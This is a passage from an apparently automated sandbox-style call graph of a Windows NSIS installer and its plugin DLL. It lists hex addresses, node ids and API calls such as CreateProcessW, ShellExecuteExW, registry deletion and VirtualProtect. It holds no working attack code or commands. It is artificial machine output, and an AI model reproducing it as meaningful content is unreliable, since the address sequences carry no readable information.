calls 4671->4673 4672 403088 4675 4030fa 31 API calls 4672->4675 4673->4676 4674 403056 4677 403315 ReadFile 4674->4677 4680 403094 4675->4680 4676->4583 4679 403061 4677->4679 4678 402e5d 6 API calls 4678->4682 4679->4668 4679->4676 4680->4676 4680->4680 4681 4030d1 SetFilePointer 4680->4681 4681->4676 4682->4664 4682->4667 4682->4671 4682->4676 4682->4678 4684 40665c 5 API calls 4683->4684 4685 4039a4 4684->4685 4686 4039aa 4685->4686 4687 4039bc 4685->4687 4779 4061c9 wsprintfW 4686->4779 4688 406150 3 API calls 4687->4688 4689 4039ec 4688->4689 4691 403a0b lstrcatW 4689->4691 4693 406150 3 API calls 4689->4693 4692 4039ba 4691->4692 4771 403c66 4692->4771 4693->4691 4696 405c5b 18 API calls 4697 403a3d 4696->4697 4698 403ad1 4697->4698 4700 406150 3 API calls 4697->4700 4699 405c5b 18 API calls 4698->4699 4701 403ad7 4699->4701 4702 403a6f 4700->4702 4703 403ae7 LoadImageW 4701->4703 4704 4062a4 17 API calls 4701->4704 4702->4698 4707 403a90 lstrlenW 4702->4707 4711 405b80 CharNextW 4702->4711 4705 403b8d 4703->4705 4706 403b0e RegisterClassW 4703->4706 4704->4703 4710 40140b 2 API calls 4705->4710 4708 403b44 SystemParametersInfoW CreateWindowExW 4706->4708 4709 403b97 4706->4709 4712 403ac4 4707->4712 4713 403a9e lstrcmpiW 4707->4713 4708->4705 4709->4585 4714 403b93 4710->4714 4716 403a8d 4711->4716 4715 405b53 3 API calls 4712->4715 4713->4712 4717 403aae GetFileAttributesW 4713->4717 4714->4709 4718 403c66 18 API calls 4714->4718 4719 403aca 4715->4719 4716->4707 4720 403aba 4717->4720 4721 403ba4 4718->4721 4780 406282 lstrcpynW 4719->4780 4720->4712 4723 405b9f 2 API calls 4720->4723 4724 403bb0 ShowWindow 4721->4724 4725 403c33 4721->4725 4723->4712 4727 4065ec 3 API calls 4724->4727 4781 4053b9 OleInitialize 4725->4781 4732 403bc8 4727->4732 4728 403c39 4729 403c55 4728->4729 4730 403c3d 4728->4730 4733 40140b 2 API calls 4729->4733 4730->4709 4737 40140b 2 API calls 4730->4737 4731 403bd6 GetClassInfoW 4735 403c00 DialogBoxParamW 4731->4735 4736 403bea GetClassInfoW RegisterClassW 4731->4736 4732->4731 4734 4065ec 3 API calls 4732->4734 4733->4709 4734->4731 4738 40140b 2 API calls 4735->4738 4736->4735 4737->4709 4738->4709 4739->4590 4740->4623 4741->4586 4743 4038c0 CloseHandle 4742->4743 4744 4038ce 4742->4744 4743->4744 4795 4038fb 4744->4795 4747 405990 67 API calls 4748 4036e9 OleUninitialize 4747->4748 4748->4596 4748->4597 4749->4629 4750->4640 4752 405db0 GetTickCount GetTempFileNameW 4751->4752 4753 403371 4752->4753 4754 405de6 4752->4754 4753->4575 4754->4752 4754->4753 4755->4657 4756->4659 4757->4663 4759 402e66 4758->4759 4760 402e7e 4758->4760 4761 402e76 4759->4761 4762 402e6f DestroyWindow 4759->4762 4763 402e86 4760->4763 4764 402e8e GetTickCount 4760->4764 4761->4666 4762->4761 4765 406698 2 API calls 4763->4765 4766 402e9c CreateDialogParamW ShowWindow 4764->4766 4767 402ebf 4764->4767 4768 402e8c 4765->4768 4766->4767 4767->4666 4768->4666 4769->4672 4770->4674 4772 403c7a 4771->4772 4788 4061c9 wsprintfW 4772->4788 4774 403ceb 4789 403d1f 4774->4789 4776 403a1b 4776->4696 4777 403cf0 4777->4776 4778 4062a4 17 API calls 4777->4778 4778->4777 4779->4692 4780->4698 4792 404263 4781->4792 4783 4053dc 4786 405403 4783->4786 4787 401389 2 API calls 4783->4787 4784 404263 SendMessageW 4785 405415 OleUninitialize 4784->4785 4785->4728 4786->4784 4787->4783 4788->4774 4790 4062a4 17 API calls 4789->4790 4791 403d2d SetWindowTextW 4790->4791 4791->4777 4793 40427b 4792->4793 4794 40426c SendMessageW 4792->4794 4793->4783 4794->4793 4796 403909 4795->4796 4797 40390e FreeLibrary GlobalFree 4796->4797 4798 4038d3 4796->4798 4797->4797 4797->4798 4798->4747 5157 401573 5158 401583 ShowWindow 5157->5158 5159 40158c 5157->5159 5158->5159 5160 40159a ShowWindow 5159->5160 5161 402abf 5159->5161 5160->5161 5162 4014f5 SetForegroundWindow 5163 402abf 5162->5163 5164 100016b6 5165 100016e5 5164->5165 5166 10001b18 22 API calls 5165->5166 5167 100016ec 5166->5167 5168 100016f3 5167->5168 5169 100016ff 5167->5169 5172 10001272 2 API calls 5168->5172 5170 10001726 5169->5170 5171 10001709 5169->5171 5174 10001750 5170->5174 5175 1000172c 5170->5175 5173 1000153d 3 API calls 5171->5173 5176 100016fd 5172->5176 5177 1000170e 5173->5177 5179 1000153d 3 API calls 5174->5179 5178 100015b4 3 API calls 5175->5178 5180 100015b4 3 API calls 5177->5180 5181 10001731 5178->5181 5179->5176 5182 10001714 5180->5182 5183 10001272 2 API calls 5181->5183 5184 10001272 2 API calls 5182->5184 5185 10001737 GlobalFree 5183->5185 5186 1000171a GlobalFree 5184->5186 5185->5176 5187 1000174b GlobalFree 5185->5187 5186->5176 5187->5176 5188 401e77 5189 402c37 17 API calls 5188->5189 5190 401e7d 5189->5190 5191 402c37 17 API calls 5190->5191 5192 401e86 5191->5192 5193 402c37 17 API calls 5192->5193 5194 401e8f 5193->5194 5195 402c37 17 API calls 5194->5195 5196 401e98 5195->5196 5197 401423 24 API calls 5196->5197 5198 401e9f 5197->5198 5205 4058aa ShellExecuteExW 5198->5205 5200 401ee1 5201 40670d 5 API calls 5200->5201 5203 402885 5200->5203 5202 401efb CloseHandle 5201->5202 5202->5203 5205->5200 5206 10002238 5207 10002296 5206->5207 5208 100022cc 5206->5208 5207->5208 5209 100022a8 GlobalAlloc 5207->5209 5209->5207 5210 40167b 5211 402c37 17 API calls 5210->5211 5212 401682 5211->5212 5213 402c37 17 API calls 5212->5213 5214 40168b 5213->5214 5215 402c37 17 API calls 5214->5215 5216 401694 MoveFileW 5215->5216 5217 4016a0 5216->5217 5218 4016a7 5216->5218 5219 401423 24 API calls 5217->5219 5220 4065c5 2 API calls 5218->5220 5222 40224a 5218->5222 5219->5222 5221 4016b6 5220->5221 5221->5222 5223 406048 36 API calls 5221->5223 5223->5217 5224 1000103d 5225 1000101b 5 API calls 5224->5225 5226 10001056 5225->5226 4844 40247e 4845 402c77 17 API calls 4844->4845 4846 402488 4845->4846 4847 402c37 17 API calls 4846->4847 4848 402491 4847->4848 4849 40249c RegQueryValueExW 4848->4849 4852 402885 4848->4852 4850 4024c2 RegCloseKey 4849->4850 4851 4024bc 4849->4851 4850->4852 4851->4850 4855 4061c9 wsprintfW 4851->4855 4855->4850 5227 4020fe 5228 402c37 17 API calls 5227->5228 5229 402105 5228->5229 5230 402c37 17 API calls 5229->5230 5231 40210f 5230->5231 5232 402c37 17 API calls 5231->5232 5233 402119 5232->5233 5234 402c37 17 API calls 5233->5234 5235 402123 5234->5235 5236 402c37 17 API calls 5235->5236 5237 40212d 5236->5237 5238 40216c CoCreateInstance 5237->5238 5239 402c37 17 API calls 5237->5239 5242 40218b 5238->5242 5239->5238 5240 401423 24 API calls 5241 40224a 5240->5241 5242->5240 5242->5241 5243 4019ff 5244 402c37 17 API calls 5243->5244 5245 401a06 5244->5245 5246 402c37 17 API calls 5245->5246 5247 401a0f 5246->5247 5248 401a16 lstrcmpiW 5247->5248 5249 401a28 lstrcmpW 5247->5249 5250 401a1c 5248->5250 5249->5250 3807 401f00 3822 402c37 3807->3822 3816 401f2b 3818 401f30 3816->3818 3819 401f3b 3816->3819 3817 402885 3847 4061c9 wsprintfW 3818->3847 3821 401f39 CloseHandle 3819->3821 3821->3817 3823 402c43 3822->3823 3848 4062a4 3823->3848 3826 401f06 3828 4052e6 3826->3828 3829 405301 3828->3829 3837 401f10 3828->3837 3830 40531d lstrlenW 3829->3830 3833 4062a4 17 API calls 3829->3833 3831 405346 3830->3831 3832 40532b lstrlenW 3830->3832 3835 405359 3831->3835 3836 40534c SetWindowTextW 3831->3836 3834 40533d lstrcatW 3832->3834 3832->3837 3833->3830 3834->3831 3835->3837 3838 40535f SendMessageW SendMessageW SendMessageW 3835->3838 3836->3835 3839 405867 CreateProcessW 3837->3839 3838->3837 3840 401f16 3839->3840 3841 40589a CloseHandle 3839->3841 3840->3817 3840->3821 3842 40670d WaitForSingleObject 3840->3842 3841->3840 3843 406727 3842->3843 3844 406739 GetExitCodeProcess 3843->3844 3890 406698 3843->3890 3844->3816 3847->3821 3849 4062b1 3848->3849 3850 4064fc 3849->3850 3853 4064ca lstrlenW 3849->3853 3856 4062a4 10 API calls 3849->3856 3857 4063df GetSystemDirectoryW 3849->3857 3859 4063f2 GetWindowsDirectoryW 3849->3859 3860 406516 5 API calls 3849->3860 3861 40646d lstrcatW 3849->3861 3862 406426 SHGetSpecialFolderLocation 3849->3862 3863 4062a4 10 API calls 3849->3863 3874 406150 3849->3874 3879 4061c9 wsprintfW 3849->3879 3880 406282 lstrcpynW 3849->3880 3851 402c64 3850->3851 3881 406282 lstrcpynW 3850->3881 3851->3826 3865 406516 3851->3865 3853->3849 3856->3853 3857->3849 3859->3849 3860->3849 3861->3849 3862->3849 3864 40643e SHGetPathFromIDListW CoTaskMemFree 3862->3864 3863->3849 3864->3849 3872 406523 3865->3872 3866 406599 3867 40659e CharPrevW 3866->3867 3869 4065bf 3866->3869 3867->3866 3868 40658c CharNextW 3868->3866 3868->3872 3869->3826 3871 406578 CharNextW 3871->3872 3872->3866 3872->3868 3872->3871 3873 406587 CharNextW 3872->3873 3886 405b80 3872->3886 3873->3868 3882 4060ef 3874->3882 3877 406184 RegQueryValueExW RegCloseKey 3878 4061b4 3877->3878 3878->3849 3879->3849 3880->3849 3881->3851 3883 4060fe 3882->3883 3884 406102 3883->3884 3885 406107 RegOpenKeyExW 3883->3885 3884->3877 3884->3878 3885->3884 3887 405b86 3886->3887 3888 405b9c 3887->3888 3889 405b8d CharNextW 3887->3889 3888->3872 3889->3887 3891 4066b5 PeekMessageW 3890->3891 3892 4066c5 WaitForSingleObject 3891->3892 3893 4066ab DispatchMessageW 3891->3893 3892->3843 3893->3891 5251 401000 5252 401037 BeginPaint GetClientRect 5251->5252 5253 40100c DefWindowProcW 5251->5253 5255 4010f3 5252->5255 5258 401179 5253->5258 5256 401073 CreateBrushIndirect FillRect DeleteObject 5255->5256 5257 4010fc 5255->5257 5256->5255 5259 401102 CreateFontIndirectW 5257->5259 5260 401167 EndPaint 5257->5260 5259->5260 5261 401112 6 API calls 5259->5261 5260->5258 5261->5260 4178 100027c2 4179 10002812 4178->4179 4180 100027d2 VirtualProtect 4178->4180 4180->4179 5262 401503 5263 40150b 5262->5263 5265 40151e 5262->5265 5264 402c15 17 API calls 5263->5264 5264->5265 4216 402306 4217 40230e 4216->4217 4220 402314 4216->4220 4218 402c37 17 API calls 4217->4218 4218->4220 4219 402322 4222 402330 4219->4222 4223 402c37 17 API calls 4219->4223 4220->4219 4221 402c37 17 API calls 4220->4221 4221->4219 4224 402c37 17 API calls 4222->4224 4223->4222 4225 402339 WritePrivateProfileStringW 4224->4225 5266 401f86 5267 402c37 17 API calls 5266->5267 5268 401f8d 5267->5268 5269 40665c 5 API calls 5268->5269 5270 401f9c 5269->5270 5271 401fb8 GlobalAlloc 5270->5271 5273 402020 5270->5273 5272 401fcc 5271->5272 5271->5273 5274 40665c 5 API calls 5272->5274 5275 401fd3 5274->5275 5276 40665c 5 API calls 5275->5276 5277 401fdd 5276->5277 5277->5273 5281 4061c9 wsprintfW 5277->5281 5279 402012 5282 4061c9 wsprintfW 5279->5282 5281->5279 5282->5273 4233 402388 4234 402390 4233->4234 4235 4023bb 4233->4235 4245 402c77 4234->4245 4237 402c37 17 API calls 4235->4237 4239 4023c2 4237->4239 4250 402cf5 4239->4250 4240 4023a1 4242 402c37 17 API calls 4240->4242 4243 4023a8 RegDeleteValueW RegCloseKey 4242->4243 4244 4023cf 4243->4244 4246 402c37 17 API calls 4245->4246 4247 402c8e 4246->4247 4248 4060ef RegOpenKeyExW 4247->4248 4249 402397 4248->4249 4249->4240 4249->4244 4251 402d0b 4250->4251 4252 402d21 4251->4252 4254 402d2a 4251->4254 4252->4244 4255 4060ef RegOpenKeyExW 4254->4255 4256 402d58 4255->4256 4257 402dd0 4256->4257 4258 402d5c 4256->4258 4257->4252 4259 402d7e RegEnumKeyW 4258->4259 4260 402d95 RegCloseKey 4258->4260 4261 402db6 RegCloseKey 4258->4261 4263 402d2a 6 API calls 4258->4263 4259->4258 4259->4260 4262 40665c 5 API calls 4260->4262 4261->4257 4264 402da5 4262->4264 4263->4258 4265 402dc4 RegDeleteKeyW 4264->4265 4266 402da9 4264->4266 4265->4257 4266->4257 5283 40190c 5284 401943 5283->5284 5285 402c37 17 API calls 5284->5285 5286 401948 5285->5286 5287 405990 67 API calls 5286->5287 5288 401951 5287->5288 5289 401d0e 5290 402c15 17 API calls 5289->5290 5291 401d15 5290->5291 5292 402c15 17 API calls 5291->5292 5293 401d21 GetDlgItem 5292->5293 5294 40258c 5293->5294 5295 1000164f 5296 10001516 GlobalFree 5295->5296 5298 10001667 5296->5298 5297 100016ad GlobalFree 5298->5297 5299 10001682 5298->5299 5300 10001699 VirtualFree 5298->5300 5299->5297 5300->5297 5301 40190f 5302 402c37 17 API calls 5301->5302 5303 401916 5302->5303 5304 4058e4 MessageBoxIndirectW 5303->5304 5305 40191f 5304->5305 5306 401491 5307 4052e6 24 API calls 5306->5307 5308 401498 5307->5308 5309 402592 5310 4025c1 5309->5310 5311 4025a6 5309->5311 5313 4025f5 5310->5313 5314 4025c6 5310->5314 5312 402c15 17 API calls 5311->5312 5320 4025ad 5312->5320 5316 402c37 17 API calls 5313->5316 5315 402c37 17 API calls 5314->5315 5317 4025cd WideCharToMultiByte lstrlenA 5315->5317 5318 4025fc lstrlenW 5316->5318 5317->5320 5318->5320 5319 402629 5321 405e26 WriteFile 5319->5321 5323 40263f 5319->5323 5320->5319 5322 405e55 5 API calls 5320->5322 5320->5323 5321->5323 5322->5319 5324 10001058 5326 10001074 5324->5326 5325 100010dd 5326->5325 5327 10001516 GlobalFree 5326->5327 5328 10001092 5326->5328 5327->5328 5329 10001516 GlobalFree 5328->5329 5330 100010a2 5329->5330 5331 100010b2 5330->5331 5332 100010a9 GlobalSize 5330->5332 5333 100010b6 GlobalAlloc 5331->5333 5334 100010c7 5331->5334 5332->5331 5335 1000153d 3 API calls 5333->5335 5336 100010d2 GlobalFree 5334->5336 5335->5334 5336->5325 5337 401c19 5338 402c15 17 API calls 5337->5338 5339 401c20 5338->5339 5340 402c15 17 API calls 5339->5340 5341 401c2d 5340->5341 5342 401c42 5341->5342 5343 402c37 17 API calls 5341->5343 5344 401c52 5342->5344 5347 402c37 17 API calls 5342->5347 5343->5342 5345 401ca9 5344->5345 5346 401c5d 5344->5346 5349 402c37 17 API calls 5345->5349 5348 402c15 17 API calls 5346->5348 5347->5344 5350 401c62 5348->5350 5351 401cae 5349->5351 5352 402c15 17 API calls 5350->5352 5353 402c37 17 API calls 5351->5353 5354 401c6e 5352->5354 5355 401cb7 FindWindowExW 5353->5355 5356 401c99 SendMessageW 5354->5356 5357 401c7b SendMessageTimeoutW 5354->5357 5358 401cd9 5355->5358 5356->5358 5357->5358 5359 402a9a SendMessageW 5360 402ab4 InvalidateRect 5359->5360 5361 402abf 5359->5361 5360->5361 5362 40281b 5363 402821 5362->5363 5364 402829 FindClose 5363->5364 5365 402abf 5363->5365 5364->5365 5366 40149e 5367 4022f1 5366->5367 5368 4014ac PostQuitMessage 5366->5368 5368->5367 5369 40469f 5370 4046d5 5369->5370 5371 4046af 5369->5371 5373 40427e 8 API calls 5370->5373 5372 404217 18 API calls 5371->5372 5374 4046bc SetDlgItemTextW 5372->5374 5375 4046e1 5373->5375 5374->5370 5376 100010e1 5377 10001111 5376->5377 5378 100011d8 GlobalFree 5377->5378 5379 100012ba 2 API calls 5377->5379 5380 100011d3 5377->5380 5381 100011f8 GlobalFree 5377->5381 5382 10001272 2 API calls 5377->5382 5383 10001164 GlobalAlloc 5377->5383 5384 100012e1 lstrcpyW 5377->5384 5385 100011c4 GlobalFree 5377->5385 5379->5377 5380->5378 5381->5377 5382->5385 5383->5377 5384->5377 5385->5377 5386 4015a3 5387 402c37 17 API calls 5386->5387 5388 4015aa SetFileAttributesW 5387->5388 5389 4015bc 5388->5389 5390 405425 5391 405446 GetDlgItem GetDlgItem GetDlgItem 5390->5391 5392 4055cf 5390->5392 5435 40424c SendMessageW 5391->5435 5394 405600 5392->5394 5395 4055d8 GetDlgItem CreateThread CloseHandle 5392->5395 5396 40562b 5394->5396 5397 405650 5394->5397 5398 405617 ShowWindow ShowWindow 5394->5398 5395->5394 5401 405665 ShowWindow 5396->5401 5402 40563f 5396->5402 5405 40568b 5396->5405 5403 40427e 8 API calls 5397->5403 5437 40424c SendMessageW 5398->5437 5399 4054b6 5404 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5399->5404 5409 405685 5401->5409 5410 405677 5401->5410 5407 4041f0 SendMessageW 5402->5407 5408 40565e 5403->5408 5411 40552b 5404->5411 5412 40550f SendMessageW SendMessageW 5404->5412 5405->5397 5406 405699 SendMessageW 5405->5406 5406->5408 5413 4056b2 CreatePopupMenu 5406->5413 5407->5397 5417 4041f0 SendMessageW 5409->5417 5416 4052e6 24 API calls 5410->5416 5414 405530 SendMessageW 5411->5414 5415 40553e 5411->5415 5412->5411 5418 4062a4 17 API calls 5413->5418 5414->5415 5419 404217 18 API calls 5415->5419 5416->5409 5417->5405 5420 4056c2 AppendMenuW 5418->5420 5421 40554e 5419->5421 5422 4056f2 TrackPopupMenu 5420->5422 5423 4056df GetWindowRect 5420->5423 5424 405557 ShowWindow 5421->5424 5425 40558b GetDlgItem SendMessageW 5421->5425 5422->5408 5426 40570d 5422->5426 5423->5422 5427 40556d ShowWindow 5424->5427 5430 40557a 5424->5430 5425->5408 5428 4055b2 SendMessageW SendMessageW 5425->5428 5429 405729 SendMessageW 5426->5429 5427->5430 5428->5408 5429->5429 5431 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5429->5431 5436 40424c SendMessageW 5430->5436 5433 40576b SendMessageW 5431->5433 5433->5433 5434 405794 GlobalUnlock SetClipboardData CloseClipboard 5433->5434 5434->5408 5435->5399 5436->5425 5437->5396 5438 4028a7 5439 402c37 17 API calls 5438->5439 5440 4028b5 5439->5440 5441 4028cb 5440->5441 5443 402c37 17 API calls 5440->5443 5442 405d4f 2 API calls 5441->5442 5444 4028d1 5442->5444 5443->5441 5466 405d74 GetFileAttributesW CreateFileW 5444->5466 5446 4028de 5447 402981 5446->5447 5448 4028ea GlobalAlloc 5446->5448 5451 402989 DeleteFileW 5447->5451 5452 40299c 5447->5452 5449 402903 5448->5449 5450 402978 CloseHandle 5448->5450 5467 40332b SetFilePointer 5449->5467 5450->5447 5451->5452 5454 402909 5455 403315 ReadFile 5454->5455 5456 402912 GlobalAlloc 5455->5456 5457 402922 5456->5457 5458 402956 5456->5458 5460 4030fa 31 API calls 5457->5460 5459 405e26 WriteFile 5458->5459 5461 402962 GlobalFree 5459->5461 5465 40292f 5460->5465 5462 4030fa 31 API calls 5461->5462 5464 402975 5462->5464 5463 40294d GlobalFree 5463->5458 5464->5450 5465->5463 5466->5446 5467->5454 4276 4058aa ShellExecuteExW 5468 40432b lstrcpynW lstrlenW 4277 40202c 4278 40203e 4277->4278 4288 4020f0 4277->4288 4279 402c37 17 API calls 4278->4279 4281 402045 4279->4281 4280 401423 24 API calls 4284 40224a 4280->4284 4282 402c37 17 API calls 4281->4282 4283 40204e 4282->4283 4285 402064 LoadLibraryExW 4283->4285 4286 402056 GetModuleHandleW 4283->4286 4287 402075 4285->4287 4285->4288 4286->4285 4286->4287 4300 4066cb WideCharToMultiByte 4287->4300 4288->4280 4291 402086 4294 4020a5 4291->4294 4295 40208e 4291->4295 4292 4020bf 4293 4052e6 24 API calls 4292->4293 4296 402096 4293->4296 4303 10001759 4294->4303 4297 401423 24 API calls 4295->4297 4296->4284 4298 4020e2 FreeLibrary 4296->4298 4297->4296 4298->4284 4301 4066f5 GetProcAddress 4300->4301 4302 402080 4300->4302 4301->4302 4302->4291 4302->4292 4304 10001789 4303->4304 4345 10001b18 4304->4345 4306 10001790 4307 100018a6 4306->4307 4308 100017a1 4306->4308 4309 100017a8 4306->4309 4307->4296 4393 10002286 4308->4393 4377 100022d0 4309->4377 4314 1000180c 4320 10001812 4314->4320 4321 1000184e 4314->4321 4315 100017ee 4406 100024a4 4315->4406 4316 100017d7 4330 100017cd 4316->4330 4403 10002b57 4316->4403 4317 100017be 4319 100017c4 4317->4319 4323 100017cf 4317->4323 4319->4330 4387 1000289c 4319->4387 4325 100015b4 3 API calls 4320->4325 4327 100024a4 10 API calls 4321->4327 4322 100017f4 4417 100015b4 4322->4417 4397 10002640 4323->4397 4332 10001828 4325->4332 4328 10001840 4327->4328 4344 10001895 4328->4344 4428 10002467 4328->4428 4330->4314 4330->4315 4335 100024a4 10 API calls 4332->4335 4334 100017d5 4334->4330 4335->4328 4339 1000189f GlobalFree 4339->4307 4341 10001881 4341->4344 4432 1000153d wsprintfW 4341->4432 4342 1000187a FreeLibrary 4342->4341 4344->4307 4344->4339 4435 1000121b GlobalAlloc 4345->4435 4347 10001b3c 4436 1000121b GlobalAlloc 4347->4436 4349 10001d7a GlobalFree GlobalFree GlobalFree 4350 10001d97 4349->4350 4367 10001de1 4349->4367 4351 100020ee 4350->4351 4360 10001dac 4350->4360 4350->4367 4353 10002110 GetModuleHandleW 4351->4353 4351->4367 4352 10001c1d GlobalAlloc 4372 10001b47 4352->4372 4355 10002121 LoadLibraryW 4353->4355 4356 10002136 4353->4356 4354 10001c86 GlobalFree 4354->4372 4355->4356 4355->4367 4443 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4356->4443 4357 10001c68 lstrcpyW 4358 10001c72 lstrcpyW 4357->4358 4358->4372 4360->4367 4439 1000122c 4360->4439 4361 10002188 4362 10002195 lstrlenW 4361->4362 4361->4367 4444 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4362->4444 4364 10002048 4364->4367 4369 10002090 lstrcpyW 4364->4369 4367->4306 4368 10002148 4368->4361 4376 10002172 GetProcAddress 4368->4376 4369->4367 4370 10001cc4 4370->4372 4437 1000158f GlobalSize GlobalAlloc 4370->4437 4371 10001f37 GlobalFree 4371->4372 4372->4349 4372->4352 4372->4354 4372->4357 4372->4358 4372->4364 4372->4367 4372->4370 4372->4371 4375 1000122c 2 API calls 4372->4375 4442 1000121b GlobalAlloc 4372->4442 4373 100021af 4373->4367 4375->4372 4376->4361 4385 100022e8 4377->4385 4379 10002410 GlobalFree 4382 100017ae 4379->4382 4379->4385 4380 100023ba GlobalAlloc 4383 100023d1 4380->4383 4381 1000238f GlobalAlloc WideCharToMultiByte 4381->4379 4382->4316 4382->4317 4382->4330 4383->4379 4450 100025d4 4383->4450 4384 1000122c GlobalAlloc lstrcpynW 4384->4385 4385->4379 4385->4380 4385->4381 4385->4383 4385->4384 4446 100012ba 4385->4446 4388 100028ae 4387->4388 4389 10002953 SetFilePointer 4388->4389 4390 10002971 4389->4390 4391 10002a62 GetLastError 4390->4391 4392 10002a6d 4390->4392 4391->4392 4392->4330 4394 10002296 4393->4394 4395 100017a7 4393->4395 4394->4395 4396 100022a8 GlobalAlloc 4394->4396 4395->4309 4396->4394 4401 1000265c 4397->4401 4398 100026c0 4400 100026c5 GlobalSize 4398->4400 4402 100026cf 4398->4402 4399 100026ad GlobalAlloc 4399->4402 4400->4402 4401->4398 4401->4399 4402->4334 4404 10002b62 4403->4404 4405 10002ba2 GlobalFree 4404->4405 4453 1000121b GlobalAlloc 4406->4453 4408 10002506 MultiByteToWideChar 4412 100024ae 4408->4412 4409 1000252b StringFromGUID2 4409->4412 4410 1000253c lstrcpynW 4410->4412 4411 1000254f wsprintfW 4411->4412 4412->4408 4412->4409 4412->4410 4412->4411 4413 1000256c GlobalFree 4412->4413 4414 100025a7 GlobalFree 4412->4414 4415 10001272 2 API calls 4412->4415 4454 100012e1 4412->4454 4413->4412 4414->4322 4415->4412 4458 1000121b GlobalAlloc 4417->4458 4419 100015ba 4420 100015c7 lstrcpyW 4419->4420 4422 100015e1 4419->4422 4423 100015fb 4420->4423 4422->4423 4424 100015e6 wsprintfW 4422->4424 4425 10001272 4423->4425 4424->4423 4426 100012b5 GlobalFree 4425->4426 4427 1000127b GlobalAlloc lstrcpynW 4425->4427 4426->4328 4427->4426 4429 10002475 4428->4429 4431 10001861 4428->4431 4430 10002491 GlobalFree 4429->4430 4429->4431 4430->4429 4431->4341 4431->4342 4433 10001272 2 API calls 4432->4433 4434 1000155e 4433->4434 4434->4344 4435->4347 4436->4372 4438 100015ad 4437->4438 4438->4370 4445 1000121b GlobalAlloc 4439->4445 4441 1000123b lstrcpynW 4441->4367 4442->4372 4443->4368 4444->4373 4445->4441 4447 100012c1 4446->4447 4448 1000122c 2 API calls 4447->4448 4449 100012df 4448->4449 4449->4385 4451 100025e2 VirtualAlloc 4450->4451 4452 10002638 4450->4452 4451->4452 4452->4383 4453->4412 4455 100012ea 4454->4455 4456 1000130c 4454->4456 4455->4456 4457 100012f0 lstrcpyW 4455->4457 4456->4412 4457->4456 4458->4419 5469 402a2f 5470 402c15 17 API calls 5469->5470 5471 402a35 5470->5471 5472 402a6c 5471->5472 5474 402885 5471->5474 5475 402a47 5471->5475 5473 4062a4 17 API calls 5472->5473 5472->5474 5473->5474 5475->5474 5477 4061c9 wsprintfW 5475->5477 5477->5474 5478 401a30 5479 402c37 17 API calls 5478->5479 5480 401a39 ExpandEnvironmentStringsW 5479->5480 5481 401a4d 5480->5481 5483 401a60 5480->5483 5482 401a52 lstrcmpW 5481->5482 5481->5483 5482->5483 5489 401db3 GetDC 5490 402c15 17 API calls 5489->5490 5491 401dc5 GetDeviceCaps MulDiv ReleaseDC 5490->5491 5492 402c15 17 API calls 5491->5492 5493 401df6 5492->5493 5494 4062a4 17 API calls 5493->5494 5495 401e33 CreateFontIndirectW 5494->5495 5496 40258c 5495->5496 5497 4043b4 5498 4044e6 5497->5498 5500 4043cc 5497->5500 5499 404550 5498->5499 5501 40461a 5498->5501 5506 404521 GetDlgItem SendMessageW 5498->5506 5499->5501 5502 40455a GetDlgItem 5499->5502 5503 404217 18 API calls 5500->5503 5508 40427e 8 API calls 5501->5508 5504 404574 5502->5504 5505 4045db 5502->5505 5507 404433 5503->5507 5504->5505 5510 40459a SendMessageW LoadCursorW SetCursor 5504->5510 5505->5501 5511 4045ed 5505->5511 5530 404239 EnableWindow 5506->5530 5513 404217 18 API calls 5507->5513 5509 404615 5508->5509 5531 404663 5510->5531 5515 404603 5511->5515 5516 4045f3 SendMessageW 5511->5516 5518 404440 CheckDlgButton 5513->5518 5515->5509 5520 404609 SendMessageW 5515->5520 5516->5515 5517 40454b 5521 40463f SendMessageW 5517->5521 5528 404239 EnableWindow 5518->5528 5520->5509 5521->5499 5523 40445e GetDlgItem 5529 40424c SendMessageW 5523->5529 5525 404474 SendMessageW 5526 404491 GetSysColor 5525->5526 5527 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5525->5527 5526->5527 5527->5509 5528->5523 5529->5525 5530->5517 5534 4058aa ShellExecuteExW 5531->5534 5533 4045c9 LoadCursorW SetCursor 5533->5505 5534->5533 5535 402835 5536 40283d 5535->5536 5537 402841 FindNextFileW 5536->5537 5538 402853 5536->5538 5537->5538 5540 4029e0 5538->5540 5541 406282 lstrcpynW 5538->5541 5541->5540 5542 401735 5543 402c37 17 API calls 5542->5543 5544 40173c SearchPathW 5543->5544 5545 4029e0 5544->5545 5546 401757 5544->5546 5546->5545 5548 406282 lstrcpynW 5546->5548 5548->5545 5549 10002a77 5550 10002a8f 5549->5550 5551 1000158f 2 API calls 5550->5551 5552 10002aaa 5551->5552 5553 4014b8 5554 4014be 5553->5554 5555 401389 2 API calls 5554->5555 5556 4014c6 5555->5556 5557 404a3c 5558 404a68 5557->5558 5559 404a4c 5557->5559 5561 404a9b 5558->5561 5562 404a6e SHGetPathFromIDListW 5558->5562 5568 4058c8 GetDlgItemTextW 5559->5568 5564 404a85 SendMessageW 5562->5564 5565 404a7e 5562->5565 5563 404a59 SendMessageW 5563->5558 5564->5561 5566 40140b 2 API calls 5565->5566 5566->5564 5568->5563 4856 403d3e 4857 403e91 4856->4857 4858 403d56 4856->4858 4860 403ea2 GetDlgItem GetDlgItem 4857->4860 4861 403ee2 4857->4861 4858->4857 4859 403d62 4858->4859 4862 403d80 4859->4862 4863 403d6d SetWindowPos 4859->4863 4864 404217 18 API calls 4860->4864 4865 403f3c 4861->4865 4874 401389 2 API calls 4861->4874 4867 403d85 ShowWindow 4862->4867 4868 403d9d 4862->4868 4863->4862 4869 403ecc SetClassLongW 4864->4869 4866 404263 SendMessageW 4865->4866 4870 403e8c 4865->4870 4897 403f4e 4866->4897 4867->4868 4871 403da5 DestroyWindow 4868->4871 4872 403dbf 4868->4872 4873 40140b 2 API calls 4869->4873 4875 4041c1 4871->4875 4876 403dc4 SetWindowLongW 4872->4876 4877 403dd5 4872->4877 4873->4861 4878 403f14 4874->4878 4875->4870 4885 4041d1 ShowWindow 4875->4885 4876->4870 4882 403de1 GetDlgItem 4877->4882 4883 403e7e 4877->4883 4878->4865 4879 403f18 SendMessageW 4878->4879 4879->4870 4880 40140b 2 API calls 4880->4897 4881 4041a2 DestroyWindow EndDialog 4881->4875 4886 403e11 4882->4886 4887 403df4 SendMessageW IsWindowEnabled 4882->4887 4884 40427e 8 API 